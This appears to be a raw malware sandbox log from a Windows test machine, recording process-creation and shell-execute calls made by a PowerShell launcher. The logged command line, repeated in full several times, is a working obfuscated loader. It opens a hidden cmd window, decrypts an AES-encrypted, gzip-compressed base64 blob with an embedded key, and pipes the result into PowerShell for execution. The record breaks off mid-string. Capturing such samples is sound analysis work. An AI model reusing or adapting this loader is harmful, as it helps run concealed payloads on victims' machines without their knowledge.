ECtY1yUANcjb3cEeUO9bl3knilh9FDUQRwCeYL1WxoN620S7kAnOoXfx8kEeVP33XtQTt93ltkqkdnprS9Vqxf7AKjjBzZUsMrvwxWLN43/urxAY51NicDkqfOiiS5UZEksZgYkfzGePaAD3+k/FiLqoZMQTwFw+M0izxrg/nsiZbpa3i/IV6c/+NcOogB/nywwRbweIX3YEXUuHCs82tKesjo/Ot93/bGW1j7HKvyUIbOGiaCrOrB88kOJPxyoAe/u1w3Tki3SWWaJvvoAzF88w+Ybhz5prRR/BNqmFaUNEhJ3KY53Em5Uhk2dyPjCCTH1Oh3TeGg55ArY2lhgXyJNnM9PoAJhRZQ5VIsin5Ie4dXCDSG76mk0usbhheT3EV6vfxmGPEiWUzuS/xlLS87slZmjDUptCv20xfVisMQyVF7pYw/QDgUlLBdx1x1eTlSGapmqmXHaPWBOFeEjHWWv6KjE7EMfuizmJ/sxk2G1fJre1b8/ruq6jS62PR1kf50MpIMDS57WFiBpoCU9bAsjEs+S8o42Yn3FakwypIpmepYNZ8Gx9wbrtDreazE+ENDlAMIn0M1b7IUAu3ceVYF1J1kRKqsHPzuyMxkRryqzFYrJNbYrt5GQ7HBUgURx+N+9NcdaI+nYpsJRGa0RVEXBCC+GkY8l8FdeTWniE6+lae6eMGi3Nx3J8axMNWyUaOJSCQ4M7GC/kLCARNNIcgCxI1hdv+fxLPb9znvLmuUf+nTFh93BQnXAIj3/W5psGXmziMwutMKhkIHWHxFe8Wdh3o+WHnqQ2/J+MSKOrxqIrmSWcT7WR0WUgDoXse8PNAvGAcmYKNSuG9GtCmgbe/qAD9eCy0u8cn+VOYBfM3TOrpB5HHsmF+MDN3qC2FRETDgUQ+h4LQAgzA/HqF/yjd/u7NiZj9HdsOlhFxrlYCucRpsx0PAQ8E1AFPDxdLWaki8BJGLHEaCIO7Q82uthpaz73zTrbIinNzqIaVv/06tuvjf5wMT72e+ebc+Ie3LQks4EVUAqJMucMMb6wCrqf06Q5czWh8SPhK9I8BH0BeeNjH3iHr2pnFvbbk4ZgWPcAfsOFpLH792L8dwJWmbpCcMC3x/qsy/IZf3/tXVSco1fZJ0bunZV1g0jqmyolR1w+n19WET8ruQmose7Nhu9l7asYHY7i5EEOQik1D+1Zz8ayZt6M20Brr8FYQc3PEHO/WDxuduF+WsnAUUNke1c0/Sc5Z5Q0PACvwwxvA738cL3AfIDeB0+E7sOMlk8llo1Sq86TXqtjBskU2gxzvbAcoq4VLUldV1yaZ5RxE7s8PnuxlU/BrRQZjUoQXKVpVvA45zvP3U61F6S9yIxyyJ1dRgd6xA2/dS1IzNVEXN7xULbuhLDf0dsgljZFVHUEuyV73vy74nrUY/4Sqn+39WN/2mqpyTEFn/Kgcgs+JZWOQKJB/IfDOPi3C7iNfR+d4WXAgdnn55N+LoWH+tub+Ad9cHn4fqRoJ6JqFB9x74HViFsT8JDleAzd72SqqutK41lQ2Bl4i0vWwQEMGTf0/QpQHyi3Vx0lqkZ+1GRJDclaKlYkaSn6RRZJpGG3yzyBWO2T4b2Xj2gmhcyL7tlTEEBINASiXC+HwTXV8tNsTyLDXA3wsTC/feEs3C6msAsZfuPdnFT9rd8a+bMj44r0ybHsgREON/jTX8pfinacU7B6ku8gbVZEB9PwUMCqJ+iaj0ByMOlo7wlZkC9bKrlaWE2zrRwiE5zOOZnwCXHChEhwzueik13nwZlEHrwjhQQiaq36qGblU5aPgspHD0zjiaX7jcHt54iPiF2jT8D1g5WB5JQjU/9wSBrDvD4uzuEPMeQb5zDbq266ptjitL2YHDqCpdmvhaeTQZMJe2YG3/j';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell -
cmdline powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - }
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2652
thread_handle: 0x00000310
process_identifier: 2648
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = 'AAAAAAAAAAAAAAAAAAAAADtnvX24mEK2hW8RbbL5X2KHm316RWatxcX3+7v4DZ/1WJXt3kVTfJMRSw/0Agv4WTgUnimICmwI1mp0XAg3wV1l/Nk/XEYdFNqy9etUj0KCfDTb9mf+9dmTWXKBqKtAB2lsN94OdJfyfwHNVl5YS8RKarUl1Fa92CUiZ50GLCwbh6h8+EZjgaGgrfnQhHaWcqL5afH+yxSykwgw3Izrd2g/ylvFlVtIKMkHCLf1+4Dcj/xQ5ogZ6x7gd8mDX36loJV53EpKf6h+YaaiNMufy/fNCnGeIREtR/cn+WGi4+4ixdaGBTiwo1Kgs7cGCgkkxZlr2cn71r0hDuQXImeUiAJmAnPDto4UJ/j+JzBmOR8MeP+aEnAxgXNZYkuwr3wjkdvGViUJBNQ5sqWDehTlvxASDUOjqVmo1Y13f5mZtAUhCbpebA95nGZbhQwnRMomhnNAMzaT11eK5942PK5bFEMQjY4VSZIAM7bocs1Ar1Jp7BkGk8KrYC5yAwWIG2DTeBIf/4HOFdNeMq7Q7cm/xdzQ2r2Ek/VpXZa0HkWNOV7zr+Gy/84f76/K8yC/ExryvPTCFuRMJOD+qeyWCTEYpsS/bLL9Ul1YIIgjoSwcjy/g0SyILOAqGlkx3/vd/Ty4K9gNxmFa+HAOS4EY2A7KRkyUxdLVqA+H0iVooSjzdnayWiArM+oMrukRZoOcwmZoHlt+4nn9HB60SXGPYMLePAwt/ZPprtnCRDidjEwkcSMxeBSWNBt8sTY/H7Jj0wM/ILKRwosFN2vrOI6SZbRjWDRbFzII3tIQ3xATLUz9u4zks9p5omogNO/y1f5BabsTnYH+m1yoX2Jber8Q64d3agsNov0p1wGN6A0FnMixd+G7JwbMZxLktrQ6PZifqI0bKrNhBnhFyUoq7wLZkD/mNidPkEJr/fsdBo2O5Eu/cOegjeWoTqwHz8pXQ/xiFcfn2t72629NwZjy5K6d8fK7zOs6w0Njj747xQp/d9HWnnpqnUOeLdXNNsEAhriP6pgziQPkG3y6SRYfa2a6RMHp7dmeEajl7H15HznbP3cTj/x9/vwQe1BnZFLgQQUGfSRhg8E1ucPuA29oU3rh5EqlfdOBFVKWWKMQCl9VEQ1pTHMXnOdrVHfY4zbj5n0c9If0mMsG2ZQfPLKYbeEjX/kyH++GJfXvjfyKJOAJqu6aNxK5XVqzgzjUCAnuZP8KdYLgsGS7TlLb+fSk/Xn/nPioV4FGgIKXJJhSNZTCVaxk9pbrF3oanii3et3L+uFov09w3An2THZTk51bsaupjHhNDnbi0YZ/uv1T2KnbRvLjUnHoaBdK7HI5NufgSm9CX0XTnifXfHdir3jNX3Pdun5yDOHm77hzqVpeOvbW3PwrB1bPSfA3R/3Xqn8TOgQonUjtmbbPnT92Lge0N7gSQM/rgWzVjZkPhLQ+3JjVLDgytJkziMMZhaCzuUg/w0He1NUVynSvkjm+6ZdvmKBZwt4zLhCAndi6OoP73GiZBq3KpUGvA7tRWDFwKGD4ljJv13CujWgL0BM5yULy6ZJ0jVuvJpALPauISoL/UCCH9BVUU1DYkCMvmwwIP278U39b41NFFpxnRyJ9ugKjsi82j7pjAT3nA9HH1diRLsmb9MzDWSMgxaKdV78OfbPMauMoA7+N2bYRd7cIvB4uFYEhldWgc1K6/aN35p8jexm6V0ju49Kjlo1Ym9jPhzgLlr8l6w1iPe7em8xpLTh1U7Wbv1Q9ayKusLDZL1OqI4YnvpHi7HXZKJytb2xPytAhixf7Hexmw6OxlPUv6a2vsi2MrRPtuWTYa7zhwahj8oK6dFToYhLSrDuPxm4Wole5Jvsd8Hvn4hUOPNLLMHb5wuVYnrZY5QEf4W73KzvQ8gl2ZS487ClvO6YOhj1b946UkRKnZGc+EyGEvJD02xtNuJBfSRtz55uBS1IniZoHHNSfRhPLDfnfnQtyFvjHYOwhQr6DT8wWGiKo02eOtRcDc6bZxY+WPhhGKvjf0km0RAM0R29ittdGYFzm24bL3wk4lK0x1RYhxLpbOrHlJlkgkzWQ3QdQ/ICxwnC8DEAv5OvUWL45UVoL92F3/X+PH/PmnAooOaltZiT97oWxsBdrvvRuusoQokRsxdGYENRgRtdMt210rIBAOXipRIxFm4yz6/1PuYG+Pyz1EHyQOB7fWuy7FG9nI432B2te02vvZ4zaMJ2pRGhXvO78aJv6wS55uib60BXrmMTS7inwUuqsv9uEM7COCed5P3ZR7FJxPG09h9EhVjzbS9fgH7Dof0OlQJ4MceKOtYvRiECtY1yUANcjb3cEeUO9bl3knilh9FDUQRwCeYL1WxoN620S7kAnOoXfx8kEeVP33XtQTt93ltkqkdnprS9Vqxf7AKjjBzZUsMrvwxWLN43/urxAY51NicDkqfOiiS5UZEksZgYkfzGePaAD3+k/FiLqoZMQTwFw+M0izxrg/nsiZbpa3i/IV6c/+NcOogB/nywwRbweIX3YEXUuHCs82tKesjo/Ot93/bGW1j7HKvyUIbOGiaCrOrB88kOJPxyoAe/u1w3Tki3SWWaJvvoAzF88w+Ybhz5prRR/BNqmFaUNEhJ3KY53Em5Uhk2dyPjCCTH1Oh3TeGg55ArY2lhgXyJNnM9PoAJhRZQ5VIsin5Ie4dXCDSG76mk0usbhheT3EV6vfxmGPEiWUzuS/xlLS87slZmjDUptCv20xfVisMQyVF7pYw/QDgUlLBdx1x1eTlSGapmqmXHaPWBOFeEjHWWv6KjE7EMfuizmJ/sxk2G1fJre1b8/ruq6jS62PR1kf50MpIMDS57WFiBpoCU9bAsjEs+S8o42Yn3FakwypIpmepYNZ8Gx9wbrtDreazE+ENDlAMIn0M1b7IUAu3ceVYF1J1kRKqsHPzuyMxkRryqzFYrJNbYrt5GQ7HBUgURx+N+9NcdaI+nYpsJRGa0RVEXBCC+GkY8l8FdeTWniE6+lae6eMGi3Nx3J8axMNWyUaOJSCQ4M7GC/kLCARNNIcgCxI1hdv+fxLPb9znvLmuUf+nTFh93BQnXAIj3/W5psGXmziMwutMKhkIHWHxFe8Wdh3o+WHnqQ2/J+MSKOrxqIrmSWcT7WR0WUgDoXse8PNAvGAcmYKNSuG9GtCmgbe/qAD9eCy0u8cn+VOYBfM3TOrpB5HHsmF+MDN3qC2FRETDgUQ+h4LQAgzA/HqF/yjd/u7NiZj9HdsOlhFxrlYCucRpsx0PAQ8E1AFPDxdLWaki8BJGLHEaCIO7Q82uthpaz73zTrbIinNzqIaVv/06tuvjf5wMT72e+ebc+Ie3LQks4EVUAqJMucMMb6wCrqf06Q5czWh8SPhK9I8BH0BeeNjH3iHr2pnFvbbk4ZgWPcAfsOFpLH792L8dwJWmbpCcMC3x/qsy/IZf3/tXVSco1fZJ0bunZV1g0jqmyolR1w+n19WET8ruQmose7Nhu9l7asYHY7i5EEOQik1D+1Zz8ayZt6M20Brr8FYQc3PEHO/WDxuduF+WsnAUUNke1c0/Sc5Z5Q0PACvwwxvA738cL3AfIDeB0+E7sOMlk8llo1Sq86TXqtjBskU2gxzvbAcoq4VLUldV1yaZ5RxE7s8PnuxlU/BrRQZjUoQXKVpVvA45zvP3U61F6S9yIxyyJ1dRgd6xA2/dS1IzNVEXN7xULbuhLDf0dsgljZFVHUEuyV73vy74nrUY/4Sqn+39WN/2mqpyTEFn/Kgcgs+JZWOQKJB/IfDOPi3C7iNfR+d4WXAgdnn55N+LoWH+tub+Ad9cHn4fqRoJ6JqFB9x74HViFsT8JDleAzd72SqqutK41lQ2Bl4i0vWwQEMGTf0/QpQHyi3Vx0lqkZ+1GRJDclaKlYkaSn6RRZJpGG3yzyBWO2T4b2Xj2gmhcyL7tlTEEBINASiXC+HwTXV8tNsTyLDXA3wsTC/feEs3C6msAsZfuPdnFT9rd8a+bMj44r0ybHsgREON/jTX8pfinacU7B6ku8gbVZEB9PwUMCqJ+iaj0ByMOlo7wlZkC9bKrlaWE2zrRwiE5zOOZnwCXHChEhwzueik13nwZlEHrwjhQQiaq36qGblU5aPgspHD0zjiaX7jcHt54iPiF2jT8D1g5WB5JQjU/9wSBrDvD4uzuEPMeQb5zDbq266ptjitL2YHDqCpdmvhaeTQZMJe2YG3/j';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - }
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000031c
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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